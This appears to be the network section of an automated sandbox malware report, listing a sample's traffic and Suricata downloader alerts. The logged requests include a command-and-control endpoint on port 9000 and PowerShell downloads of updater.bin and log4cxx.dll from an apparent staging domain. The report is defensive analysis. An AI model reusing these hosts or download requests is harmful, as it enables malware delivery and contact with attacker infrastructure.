Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49891
Source: unknown | Network traffic detected: HTTP traffic on port 49892 -> 9000
Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49892
Source: unknown | Network traffic detected: HTTP traffic on port 49894 -> 9000
Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49894
Source: unknown | Network traffic detected: HTTP traffic on port 49895 -> 9000
Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49895
Source: unknown | Network traffic detected: HTTP traffic on port 49896 -> 9000
Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49896
Source: unknown | Network traffic detected: HTTP traffic on port 49897 -> 9000
Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49897
Source: unknown | Network traffic detected: HTTP traffic on port 49898 -> 9000
Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49898
Source: unknown | Network traffic detected: HTTP traffic on port 49899 -> 9000
Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49899
Source: unknown | Network traffic detected: HTTP traffic on port 49901 -> 9000
Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49901
Source: unknown | Network traffic detected: HTTP traffic on port 49903 -> 9000
Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49903
Source: unknown | Network traffic detected: HTTP traffic on port 49904 -> 9000
Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49904
Source: unknown | Network traffic detected: HTTP traffic on port 49905 -> 9000
Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49905
Source: unknown | Network traffic detected: HTTP traffic on port 49906 -> 9000
Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49906
Source: unknown | Network traffic detected: HTTP traffic on port 49907 -> 9000
Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49907
Source: unknown | Network traffic detected: HTTP traffic on port 49909 -> 9000
Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49909
Source: global traffic | TCP traffic: 192.168.2.8:49735 -> 185.147.124.236:15647
Source: global traffic | HTTP traffic detected: GET /SFHgtxFGtB HTTP/1.1 | Host: nopaste.net | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /a/index.js HTTP/1.1 | Host: google.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js HTTP/1.1 | Host: google.com
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GPDShLsGIjBNTHa46vhxxzI3svQ2szOEquLGyUyxZxQBuj2RZQlJDuaKtjFLGaUS0kljB8sf1rEyBj5qY25kcloBQw HTTP/1.1 | Host: www.google.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D6f35d797be3b4dc6:TM%3D1734420848:C%3D%3E:IP%3D8.46.123.189-:S%3Dy11mmdgPywBUlb0wwtqtLg%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:34:08+GMT HTTP/1.1 | Host: google.com
Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js HTTP/1.1 | Host: google.com
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GPjShLsGIjBkAj9GyYe8Mn2VArflOAX5Dkd5hzoKr4HdzMDUeL7cS7nxMVqELnj-2vfHDftexjIyBj5qY25kcloBQw HTTP/1.1 | Host: www.google.com
Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D4edbbc5636b91633:TM%3D1734420856:C%3D%3E:IP%3D8.46.123.189-:S%3DPiAKh5tPdjoYVKgKQ9pekg%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:34:16+GMT HTTP/1.1 | Host: google.com
Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js HTTP/1.1 | Host: google.com
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GIHThLsGIjDx5ax6an8IrIbGtSaXkbbuFYbqM7u7GZiN3ocBa9VXlBoeuufcB9hH8_B5r50qEZgyBj5qY25kcloBQw HTTP/1.1 | Host: www.google.com
Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Db212ceae686b1a2b:TM%3D1734420865:C%3D%3E:IP%3D8.46.123.189-:S%3DwJnO3udFkZJpEbz-woKiKQ%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:34:25+GMT HTTP/1.1 | Host: google.com
Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js HTTP/1.1 | Host: google.com
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GInThLsGIjDrIt0scVVtiM3JSFb3RaUTq6pNgYIPpnrHnLioDhCG72Z5awWy0pxCwx8WHQsbJDcyBj5qY25kcloBQw HTTP/1.1 | Host: www.google.com
Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D5c9740ab0f014298:TM%3D1734420873:C%3D%3E:IP%3D8.46.123.189-:S%3D8xlQ4eS6xBOUqChbFuYdlg%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:34:33+GMT HTTP/1.1 | Host: google.com
Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js HTTP/1.1 | Host: google.com
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GJHThLsGIjDsl9uk8UMti6vyOA2cwCYybTHi-uN-Vu1eWDKU71mz6DhAj3ZMShBV8DjUM6Fi4UQyBj5qY25kcloBQw HTTP/1.1 | Host: www.google.com
Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Dcdda55c2ba0f73fc:TM%3D1734420881:C%3D%3E:IP%3D8.46.123.189-:S%3DE-lUnmev__1s1eaH-leEqg%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:34:41+GMT HTTP/1.1 | Host: google.com
Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js HTTP/1.1 | Host: google.com
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GJrThLsGIjDVWMIW0wC8D2vGAbX1xnBEZhZaln0JIWUmCohbpzzAdFCe8y9sYqb95h1at--W3X0yBj5qY25kcloBQw HTTP/1.1 | Host: www.google.com
Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D07bbdd56f84a91b2:TM%3D1734420890:C%3D%3E:IP%3D8.46.123.189-:S%3DGTmgNXRDtmZ23aRpU0VFnA%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:34:50+GMT HTTP/1.1 | Host: google.com
Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js HTTP/1.1 | Host: google.com
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GKPThLsGIjBpAOY3pfJzmb7hAtEDpxCUuKZW0ZqVks7Dnms80pix_XdHqWsZBXHZKWdv90VUOt0yBj5qY25kcloBQw HTTP/1.1 | Host: www.google.com
Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D415b9979ef9707d3:TM%3D1734420899:C%3D%3E:IP%3D8.46.123.189-:S%3DJjL-oHlW3PNBRyuC4U_qog%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:34:59+GMT HTTP/1.1 | Host: google.com
Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js HTTP/1.1 | Host: google.com
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GKvThLsGIjD-3KW32JCZ0mH01QvjulstQQuqXTlrEycWV1xiEPH6R7VbH1HmmmgIPZKaWcmDmHcyBj5qY25kcloBQw HTTP/1.1 | Host: www.google.com
Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Df1b0eeacb1f5bf1d:TM%3D1734420907:C%3D%3E:IP%3D8.46.123.189-:S%3DpcHyDhL6gH6T7NMyEqzmBw%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:35:07+GMT HTTP/1.1 | Host: google.com
                    Source: global trafficHTTP traffic detected: GET /a/cpanel/index.js HTTP/1.1Host: google.com
                    Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GLPThLsGIjC5NCvaD3O47Z78iPrh7tlF9-ZWdw7GF4ML25f6J-xdtDjbHzyiG58btUPG2e9OBnkyBj5qY25kcloBQw HTTP/1.1Host: www.google.com
                    Source: global trafficHTTP traffic detected: GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D5312552b7084d89d:TM%3D1734420915:C%3D%3E:IP%3D8.46.123.189-:S%3DBOR3OdsBSIJZK1XomcJ1Iw%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:35:15+GMT HTTP/1.1Host: google.com
                    Source: global trafficHTTP traffic detected: GET /a/cpanel/index.js HTTP/1.1Host: google.com
                    Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GLzThLsGIjAnI-kc_6L7Me3lHKCt5WMda-CG5i_K3cmh0UCzxSMtqg5PaFFo8f0R7aN5C-DK-QoyBj5qY25kcloBQw HTTP/1.1Host: www.google.com
                    Source: global trafficHTTP traffic detected: GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D263b62db633173b7:TM%3D1734420924:C%3D%3E:IP%3D8.46.123.189-:S%3DS0P5qqAynxx9i1z3ErwX-A%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:35:24+GMT HTTP/1.1Host: google.com
                    Source: global trafficHTTP traffic detected: GET /a/cpanel/index.js HTTP/1.1Host: google.com
                    Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GMTThLsGIjAsC5MLadFNwAXv_38UzRpf6V2jt1cMZErwfkTIE5y365C9qnV4qYgmmcxhTxkKjc8yBj5qY25kcloBQw HTTP/1.1Host: www.google.com
                    Source: global trafficHTTP traffic detected: GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D1b21e1938b173488:TM%3D1734420932:C%3D%3E:IP%3D8.46.123.189-:S%3DMRKByaEiGwbvo56zhJL4Uw%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:35:32+GMT HTTP/1.1Host: google.com
                    Source: global trafficHTTP traffic detected: GET /a/cpanel/index.js HTTP/1.1Host: google.com
                    Source: global traffic | HTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1; Host: 185.147.124.236:9000; Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1; Host: 185.147.124.236:9000
                    Source: Joe Sandbox View | IP Address: 185.147.124.236
                    Source: Joe Sandbox View | ASN Name: E-STYLEISP-ASRU
                    Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASNUS
                    Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49749 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49742 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49751 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49753 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49745 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49740 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49754 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49761 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49760 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49743 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49756 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49765 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49766 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49771 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49772 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49768 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49775 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49785 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49782 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49786 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49791 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49800 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49799 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49805 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49812 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49814 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49821 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49820 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49823 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49824 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49826 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49828 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49832 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49807 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49836 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49838 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49840 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49841 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49843 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49847 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49852 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49853 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49854 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49861 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49869 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49872 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49874 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49878 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49886 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49887 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49892 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49897 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49899 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49903 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49904 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49906 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49848 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49715 -> 142.250.181.142:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49724 -> 142.250.181.142:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49727 -> 142.250.181.142:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49728 -> 104.21.87.65:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49731 -> 172.217.19.228:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49733 -> 142.250.181.142:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49738 -> 142.250.181.142:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49732 -> 142.250.181.142:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49734 -> 172.217.19.228:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49750 -> 172.217.19.228:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49759 -> 172.217.19.228:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49762 -> 142.250.181.142:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49741 -> 172.217.19.228:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49767 -> 172.217.19.228:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49770 -> 142.250.181.142:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49778 -> 142.250.181.142:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49736 -> 142.250.181.142:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49801 -> 172.217.19.228:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49744 -> 142.250.181.142:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49798 -> 142.250.181.142:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49784 -> 172.217.19.228:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49776 -> 172.217.19.228:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49795 -> 142.250.181.142:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49806 -> 142.250.181.142:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49747 -> 142.250.181.142:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49792 -> 172.217.19.228:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49752 -> 142.250.181.142:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49787 -> 142.250.181.142:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49773 -> 142.250.181.142:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49804 -> 142.250.181.142:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49790 -> 142.250.181.142:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49755 -> 142.250.181.142:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49781 -> 142.250.181.142:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49764 -> 142.250.181.142:443
                    Source: global traffic | HTTP traffic detected: GET /api/uz/0912545164/updater.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: docu-signer.com | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /api/uz/0912545164/log4cxx.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: docu-signer.com
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 23.206.229.226
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 52.182.143.211
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
